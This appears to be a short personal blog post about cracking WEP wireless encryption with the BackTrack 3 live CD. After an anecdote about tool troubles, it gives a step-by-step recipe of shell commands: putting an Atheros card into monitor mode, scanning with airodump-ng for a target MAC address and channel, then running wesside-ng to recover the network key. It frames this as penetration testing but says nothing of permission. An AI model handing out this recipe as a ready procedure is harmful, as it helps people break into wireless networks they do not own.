Hack Attack: WEP decyption for dummies

I've discovered 3 important things today.

First off - don't ever try to do pen (penetration) testing of wireless networks on a windows machine. Just don't. The major problem (when you get past the fact there are about 3 wireless adaptors that actually work) is that all the best tools are firmly linux based. So your left with shoddy ports (and Cain&Abel which is hardly speedy!).

The second thing I learnt is that VMWare doesn't support PCMCIA cards on a laptop. DOESN'T. Mind you I found this out after playing about with it for a couple of hours - believing that it would work... so 3pm this afternoon switch I switched to a Linux LiveCD (BackTrack 3 as it happen).

Which was when I found out the third thing: Backtrack 3 works, out of the box, no setup, very little cfg. In under half an hour it was running, recognising the wireless card and attacking the network. 40 mins later - voila network key found.

So really I learnt only one thing today: which was that Backtrack 3 is an amazingly neat and efficient tool and I think we shall be seeing a lot more of it!

-----

Oh also some advice: if your using Backtrack 3 with an Atheros based wifi card (which would be a large amount of cards) and are struggling with all the tutorials over configuring the setup. IGNORE THEM. It does work and is very very simple. Here is the best way to do things (using the KISS principle of destroy it all then start from scratch):

Type: iwconfig

This ID's all your wirless cards. For EVERYTHING that is on that list type: wlanconfig <name e.g atho> destroy

Then type this command (ath0 and wifi0 may change for you - use common sense): wlanconfig ath0 create wlandev wifi0 wlanmode monitor

Sorted.

Now you can fire up airodump-ng on ath0 (or whatever) and scan for some MAC addresses. Note down the one you want to attack and the channel it sits on.

Type (again substitute your name for ath0): airmon-ng ath0 start <channel>

And finally start up the AWESOME wesside-ng tool which automates the cracking process (it may not be stable so give it a few tries: and make sure you are locked to channel with the command above or it will confuse itself :)).

Command: wesside-ng -i ath0 -v <mac address>

Hit enter and sit and wait. It could take minutes or hours but it will usually do it.

Enjoy.